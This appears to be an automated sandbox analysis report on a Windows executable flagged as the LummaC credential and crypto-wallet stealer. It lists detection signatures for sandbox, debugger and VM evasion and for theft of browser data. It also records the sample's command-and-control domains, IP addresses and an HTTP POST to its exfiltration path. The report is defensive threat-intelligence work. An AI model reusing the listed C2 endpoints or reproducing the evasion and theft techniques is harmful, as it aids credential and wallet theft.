Edit tour

Windows Analysis Report
FvbuInU.exe

Overview

General Information

Sample name:	FvbuInU.exe
Analysis ID:	1632098
MD5:	a4069f02cdd899c78f3a4ee62ea9a89a
SHA1:	c1e22136f95aab613e35a29b8df3cfb933e4bda2
SHA256:	3342c1acf9c247d7737a732ed3e1b3cf64be072b4094f41d50fc1c0ee944d6f4
Tags:	exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

PE file contains section with special chars

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

FvbuInU.exe (PID: 7544 cmdline: "C:\Users\user\Desktop\FvbuInU.exe" MD5: A4069F02CDD899C78F3A4EE62EA9A89A)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.1531650734.0000000001590000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1531468929.0000000001580000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1531596694.00000000015D0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FvbuInU.exe PID: 7544	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: FvbuInU.exe PID: 7544	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.FvbuInU.exe.d60000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T19:37:30.899123+0100	2028371	3	Unknown Traffic	192.168.2.6	49687	104.21.53.52	443	TCP
2025-03-07T19:37:36.436560+0100	2028371	3	Unknown Traffic	192.168.2.6	49688	104.21.53.52	443	TCP
2025-03-07T19:37:41.094080+0100	2028371	3	Unknown Traffic	192.168.2.6	49689	104.21.53.52	443	TCP
2025-03-07T19:37:46.246258+0100	2028371	3	Unknown Traffic	192.168.2.6	49690	104.21.53.52	443	TCP
2025-03-07T19:37:52.577430+0100	2028371	3	Unknown Traffic	192.168.2.6	49691	104.21.53.52	443	TCP
2025-03-07T19:38:15.919366+0100	2028371	3	Unknown Traffic	192.168.2.6	49694	104.21.53.52	443	TCP
2025-03-07T19:38:23.280842+0100	2028371	3	Unknown Traffic	192.168.2.6	49695	104.21.53.52	443	TCP
2025-03-07T19:38:31.004250+0100	2028371	3	Unknown Traffic	192.168.2.6	49696	188.114.96.3	443	TCP

HTTP traffic detected: POST /aQwdw HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: nebdulaq.digital

Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: FvbuInU.exe, 00000000.00000003.1469448022.0000000005CBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world/
Source: FvbuInU.exe, 00000000.00000002.1968657019.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000002.1968954810.00000000015EB000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967345625.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967231255.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967433733.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000002.1968730807.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world/QwdZdf
Source: FvbuInU.exe, 00000000.00000002.1968730807.00000000015BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world/QwdZdfU
Source: FvbuInU.exe, 00000000.00000002.1968562073.0000000001553000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001553000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://begindecafer.world:443/QwdZdflt-release/key4.dbPK
Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: FvbuInU.exe, 00000000.00000003.1853538978.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1772677820.0000000001590000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital/
Source: FvbuInU.exe, 00000000.00000003.1967004894.0000000001580000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1419924054.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital/aQwdw
Source: FvbuInU.exe, 00000000.00000002.1968513015.0000000001547000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001547000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital/aQwdw$
Source: FvbuInU.exe, 00000000.00000003.1771907391.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1771794588.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1772740310.00000000015C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital/aQwdw%
Source: FvbuInU.exe, 00000000.00000003.1419875195.0000000005C89000.00000004.00000800.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1419924054.0000000005C8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital/aQwdw)
Source: FvbuInU.exe, 00000000.00000003.1468100201.0000000005C8C000.00000004.00000800.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1468985650.0000000005C8F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital/aQwdw2
Source: FvbuInU.exe, 00000000.00000003.1468276097.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital/aQwdw?
Source: FvbuInU.exe, 00000000.00000003.1531549677.0000000001553000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital:443/aQwdw
Source: FvbuInU.exe, 00000000.00000002.1968562073.0000000001553000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1967004894.0000000001553000.00000004.00000020.00020000.00000000.sdmp, FvbuInU.exe, 00000000.00000003.1853538978.0000000001553000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nebdulaq.digital:443/aQwdwmartFTP
Source: FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: FvbuInU.exe, 00000000.00000003.1362855346.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: FvbuInU.exe, 00000000.00000003.1470330878.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.or
Source: FvbuInU.exe, 00000000.00000003.1470330878.0000000005CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: FvbuInU.exe, 00000000.00000003.1470490451.0000000005DAB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: FvbuInU.exe, 00000000.00000003.1519162636.00000000015FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443

Source: unknown	HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49687 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49688 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49691 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.53.52:443 -> 192.168.2.6:49695 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49696 version: TLS 1.2

System Summary

PE file contains section with special chars

Source: FvbuInU.exe	Static PE information: section name:
Source: FvbuInU.exe	Static PE information: section name: .idata
Source: FvbuInU.exe	Static PE information: section name:

Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D900B0	0_2_00D900B0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DAC320	0_2_00DAC320
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D7A430	0_2_00D7A430
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D88900	0_2_00D88900
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D8CBB0	0_2_00D8CBB0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D80B40	0_2_00D80B40
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DAD0C0	0_2_00DAD0C0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D7B1D8	0_2_00D7B1D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D973CB	0_2_00D973CB
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D755F6	0_2_00D755F6
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA76C0	0_2_00DA76C0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D6D780	0_2_00D6D780
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA9775	0_2_00DA9775
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA38C0	0_2_00DA38C0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D71822	0_2_00D71822
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D6DA3A	0_2_00D6DA3A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA3C30	0_2_00DA3C30
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EC60E8	0_2_00EC60E8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EAA0E0	0_2_00EAA0E0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA40F7	0_2_00EA40F7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E700DE	0_2_00E700DE
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EAE0D7	0_2_00EAE0D7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E440AC	0_2_00E440AC
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DDC08D	0_2_00DDC08D
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00ECE0B9	0_2_00ECE0B9
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E0C089	0_2_00E0C089
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DAC0A0	0_2_00DAC0A0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D7E0AC	0_2_00D7E0AC
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA8062	0_2_00EA8062
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DD2040	0_2_00DD2040
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E1E049	0_2_00E1E049
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E1C048	0_2_00E1C048
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E54021	0_2_00E54021
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E86027	0_2_00E86027
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DEC00B	0_2_00DEC00B
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DF8007	0_2_00DF8007
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E2E008	0_2_00E2E008
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DCE02E	0_2_00DCE02E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DEE024	0_2_00DEE024
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E0201A	0_2_00E0201A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E1A01B	0_2_00E1A01B
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D961D8	0_2_00D961D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00F301FA	0_2_00F301FA
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E761C3	0_2_00E761C3
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E9A1D7	0_2_00E9A1D7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E0E1A3	0_2_00E0E1A3
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E921AC	0_2_00E921AC
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA81A0	0_2_00EA81A0
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D80180	0_2_00D80180
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E1C1BB	0_2_00E1C1BB
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EB818E	0_2_00EB818E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E08186	0_2_00E08186
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E6C196	0_2_00E6C196
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E3A19D	0_2_00E3A19D
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E7216C	0_2_00E7216C
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00ED8177	0_2_00ED8177
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA614F	0_2_00EA614F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D9617E	0_2_00D9617E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E3E15F	0_2_00E3E15F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E74125	0_2_00E74125
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EC2139	0_2_00EC2139
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E6610C	0_2_00E6610C
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E88119	0_2_00E88119
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D92120	0_2_00D92120
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E7E2ED	0_2_00E7E2ED
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D7E2C6	0_2_00D7E2C6
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E162F9	0_2_00E162F9
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D962F9	0_2_00D962F9
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E602C3	0_2_00E602C3
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA22CD	0_2_00EA22CD
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EC42C7	0_2_00EC42C7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E9E2D8	0_2_00E9E2D8
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EBE2A1	0_2_00EBE2A1
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DF2283	0_2_00DF2283
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E7A284	0_2_00E7A284
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E8028F	0_2_00E8028F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00ECA283	0_2_00ECA283
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E70297	0_2_00E70297
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EB6273	0_2_00EB6273
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DA8240	0_2_00DA8240
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DFC240	0_2_00DFC240
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E5E24A	0_2_00E5E24A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E5025A	0_2_00E5025A
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00ED222F	0_2_00ED222F
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE6207	0_2_00DE6207
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DF0203	0_2_00DF0203
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E5220C	0_2_00E5220C
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE2226	0_2_00DE2226
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E96212	0_2_00E96212
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE43DF	0_2_00DE43DF
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DF43D2	0_2_00DF43D2
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EB23F9	0_2_00EB23F9
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E223C5	0_2_00E223C5
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E5A3C9	0_2_00E5A3C9
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DCE3F3	0_2_00DCE3F3
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E103DA	0_2_00E103DA
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E463A7	0_2_00E463A7
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D6A390	0_2_00D6A390
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DEE384	0_2_00DEE384
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E8E380	0_2_00E8E380
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00ED436E	0_2_00ED436E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E3436B	0_2_00E3436B
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E8637E	0_2_00E8637E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E94348	0_2_00E94348
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE237B	0_2_00DE237B
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E9034E	0_2_00E9034E
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E54348	0_2_00E54348
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DFA365	0_2_00DFA365
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00D76312	0_2_00D76312
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E2C304	0_2_00E2C304
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EBC303	0_2_00EBC303
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E24311	0_2_00E24311
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00E424E5	0_2_00E424E5
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EAC4E6	0_2_00EAC4E6
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00DE64FB	0_2_00DE64FB
Source: C:\Users\user\Desktop\FvbuInU.exe	Code function: 0_2_00EA24CF	0_2_00EA24CF
